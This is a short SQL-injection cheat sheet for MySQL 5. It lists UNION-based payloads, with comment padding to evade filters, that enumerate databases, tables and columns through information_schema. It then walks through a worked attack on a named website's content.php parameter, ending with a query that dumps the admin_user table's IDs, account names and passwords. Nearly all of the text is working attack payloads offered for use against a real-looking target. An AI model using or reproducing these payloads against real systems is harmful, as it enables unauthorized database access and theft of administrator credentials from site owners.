Enumerate databases

id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*

Enumerate tables

id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=<hex value of the database name>/**/limit/**/1,1

Enumerate columns

id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=<hex value of the table name>/**/limit/**/1,1
Advanced MySQL 5 injection method for dumping tables

Example:

1. Dump tables
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574 is the hex encoding of the database name yd_teamnet)
Enumerating this way, the admin_user table shows up at the 4th entry.

2. Dump columns
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3. Dump the password
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*